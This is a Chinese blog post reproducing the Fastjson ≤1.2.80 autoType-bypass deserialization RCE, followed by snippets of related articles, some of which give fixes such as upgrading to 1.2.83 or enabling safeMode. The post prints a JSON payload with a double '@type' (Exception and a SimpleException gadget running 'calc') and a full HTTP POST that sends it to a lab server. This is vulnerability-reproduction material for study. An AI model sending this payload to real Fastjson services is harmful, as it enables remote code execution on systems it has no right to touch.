Fastjson 1.2.80 及以下版本反序列化漏洞(FastJson ≤1.2.80) rce

最新推荐文章于 2024-08-31 06:45:00 发布
最新推荐文章于 2024-08-31 06:45:00 发布
阅读量1.8k 收藏
点赞数
文章标签: 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/130481401
版权

0x01简要描述

Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON字符串,也可以从 JSON 字符串反序列化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可以在特定依赖下利用此漏洞绕过默认autoType 关闭限制,从而反序列化有安全风险的类。

 0x02影响版本

FastJson ≤1.2.80

0x03漏洞复现

漏洞payload

{    "@type": "java.lang.Exception",    "@type": "com.github.isafeblue.fastjson.SimpleException",    "domain": "calc"}

 下载源码启动环境,发送payload

POST /addComment HTTP/1.1
Host: 10.211.55.7:8099
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 40
Content-Type: application/json; charset=utf-8
Cookie: LOGIN_LANG=cn
Origin: http://10.211.55.7:8099
Referer: http://10.211.55.7:8099/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
X-Requested-With: XMLHttpRequest

{
    "@type": "java.lang.Exception",
    "@type": "com.github.isafeblue.fastjson.SimpleException",
    "domain": "calc"
}

 

 成功执行

 

 

yggcwhat
关注
fastjson1.2.80反序列化漏洞及POC代码及规避方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-11 3225
解决方案2:safeMode加固 fastjson1.2.68级之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可杜绝反序列化Gadgets类变种攻击(关闭autoType注意评估对业务的影响)。 开启方法: https://github.com/alibaba/fastjson/wiki/fastjson_safemode 1.2.83修复了此次发现的漏洞,开启safeMode是完全关闭autoType功能,避免类似问题再次发生,这可能会有
红队武器库:fastjson小于1.2.68全漏洞RCE利用exp复现
热门推荐
god_Zeo的安全博客
07-04 5万+
0x01漏洞介绍 Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 0x02影响范围 Fastjson < 1.2.68 Fastjson爆出的绕过方法可以通杀1.2.68版本以下所有 0x03漏洞复现 下面以Fastjson 1.2.47 为例子,因为vulhub有现成的环境十分方便
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。
Fastjson反序列化漏洞:深入探讨与安全防范
最新发布
xycxycooo的博客
08-31 1178
通过本文的讲解,我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson反序列化过程中,对输入数据的安全性验证不足,导致攻击者可以构造恶意JSON数据,触发反序列化操作,进而执行任意代码或命令。为了避免这类漏洞,可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证等安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞安全防范。如果你有任何问题或需要进一步的解释,请随时提问。
复现fastjson反序化漏洞(fastjson1.2.80)
TVT111的博客
07-21 3204
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序化漏洞
fastjson <= 1.2.80 反序列化任意代码执行漏洞
qq_18209847的博客
05-24 4540
fastjson <= 1.2.80 反序列化任意代码执行漏洞
Fastjson 1.2.80 及之前版本反序列化漏洞
AlbenXie的博客
05-26 1601
修复建议: 1.升级到最新版本1.2.83,下载链接:Release FASTJSON 1.2.83版本发布(安全修复) · alibaba/fastjson · GitHub 2.升级到 Fastjson v2,Fastjson v2地址:https://github.com/alibaba/fastjson2/releases
Fastjson反序列化漏洞
yyj1781572的博客
04-13 2086
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
fastjson 1.2.80版本反序列化漏洞:POC代码及规避方案(20220523)
杨小熊学习笔记
05-29 7654
fasjton 1.2.80版本反序列化漏洞:POC代码及规避方案(20220523)
Fastjson小于1.2.67 UnSerializable RCE分析研究
12-20
然而,在某些配置下,Fastjson存在一个严重的安全问题,即反序列化导致的远程代码执行(Remote Code Execution,简称RCE漏洞。 **漏洞影响范围** 此漏洞影响Fastjson的所有版本,直至1.2.66。如果你的应用程序...
代码审计-fastjson1.2.68分析
cdyunaq的博客
03-07 2340
前言 1.2.68有safeMode,但是默认不是开启的,所以还是有风险 分析1 根据网上信息的描述,这次问题点主要是在checkAutoType参数期望类这个地方 看看哪些地方会调用checkAutoType方法并使用到期望类这个参数 发现主要是2个地方会使用到 com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#deserialze com.alibaba.fastjson.parser.deser
fastjson1.2.80
08-25
Fastjson v1.2.80存在AutoType绕过反序列化漏洞。 该版本引入了AutoType机制,其中在`DefaultJSONParser`中增加了`checkAutoType`检查来解决该漏洞。 您引用的POST请求中构造了一个POC来利用该漏洞。 该POC通过使用...
渗透测试-Fastjson版本漏洞分析(下)
cdyunaq的博客
04-18 4155
- fastjson 1.2.45 - 1.2.44中对[进行了判断,我们用1.2.43的POC,然后下个JSONException的异常断点,看看是怎么判断的 运行后,在com.alibaba.fastjson.parser.ParserConfig#checkAutoType(java.lang.String, java.lang.Class, int)成功拦截 分析一下,发现如果开头是[就直接抛出异常 那再看看1.2.41里面的绕法呢,前面加个L,后面加个;,发现会检查结尾是否为;,是的话
漏洞分析】Fastjson1.2.80版本RCE漏洞原理
olga5abl的博客
10-24 2705
通过研究v1.2.50和v1.2.68的绕过方式,主要是在ObjectDeserializer接口的子类JavaBeanDeserializer中存在expectClass非空的checkAutoType调用,这也是绕过的关键。这就是Fastjson中引入AutoType的原因,但是也正因为这个特性,因为功能设计之初在安全方面考虑不周,给后续的Fastjson使用者带来了无尽的痛苦。但是,Fastjson在序列化及反序列化的过程中,没有使用Java自带的序列化机制,而是自定义了一套机制。
麻了,Fastjson 1.2.80 及之前版本存在 Throwable 反序列化漏洞
方志朋的博客
05-29 522
欢迎关注方志朋的博客,回复”666“获面试宝典近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致反序列化漏洞漏洞描述Fastjson 是阿里巴巴开源的 Java 对象和 JSON 格式字符串的快速转换的工具库。Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞...
【JNPF修改通告】fastjson1.2.80反序列化漏洞
JNPF 专注低代码开发
05-27 367
近日Fastjson Develop Team 发现 fastjson 1.2.80以下存在新的风险,存在反序列化漏洞。攻击者可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大,请大家关注。 目前JNPF官方已完成修复,故在此建议诸位JNPF用户应尽快修复。 修复方案 航天筑梦科技兴国 微服务版 修改jnpf-java-cloud\pom.xml文件中的,fastjson.version 版本号‍‍ 单体版 修改jnpf-java-boot\pom.xml文件中的,fast
Fastjson反序列化漏洞风险
詹Sir的博客
05-30 315
这样的场景你是不是很熟悉?客户让你做一个软件,你需要他给你写出需求,当他给你写出需求后,在你认为时间非常紧的情况下,你辛辛苦苦,加班加点,费劲九牛二虎之力,最后赶在最后时刻给客户提交了,你满怀希望等待客户给你的表扬,你万分坚信领导对你的辛苦会给予高度认可和鼓励,你觉得很快就要戴一朵“小红花”时,最后你得到的是绵绵无绝期的等待,甚至是客户的不满意,这是为什么呢?这种情况在我的团队里也会出现,有时候我让改一个东西,经常得到的回复就是:”客户就是这么要求的,而且描述很清晰,不能改!”, 最后如果不改的结果就是客
Fastjson反序列化远程代码执行漏洞
qq_37634156的博客
06-08 1873
Fastjson
关于Java组件fastjson存在反序列化漏洞
lujiawei00的专栏
08-25 1568
据国家网络与信息安全信息通报中心监测发现,阿里巴巴公司开源Java开发组件fastjson存在反序列化漏洞fastjson被众多java软件作为组件集成,广泛存在于java应用的服务端代码中。攻击者可利用上述漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。此次事件影响fastjson1. 2. 80及之前所有版本
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值